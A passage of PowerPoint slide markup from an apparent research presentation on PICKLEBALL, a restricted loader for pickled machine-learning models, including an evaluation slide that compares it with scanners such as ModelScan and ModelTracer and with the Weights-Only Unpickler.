                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>is compared to  State of the Art solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="987" name="Google Shape;987;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294625"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="988" name="Google Shape;988;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294637"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="989" name="Google Shape;989;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294631"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="990" name="Google Shape;990;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2317214"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991" name="Google Shape;991;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="3533187"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="992" name="Google Shape;992;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="3533181"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="993" name="Google Shape;993;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="3448829"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="994" name="Google Shape;994;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904225"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="Google Shape;995;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904237"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="996" name="Google Shape;996;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904231"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="997" name="Google Shape;997;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2926814"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="998" name="Google Shape;998;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="4142787"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="999" name="Google Shape;999;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="4142781"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1000" name="Google Shape;1000;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="4058429"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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04" name="Shape 1004"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Google Shape;1005;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Google Shape;1006;p80"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1007" name="Google Shape;1007;p80"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Google Shape;1008;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2337050"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Static analysis tool integrated on Hugging Face.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
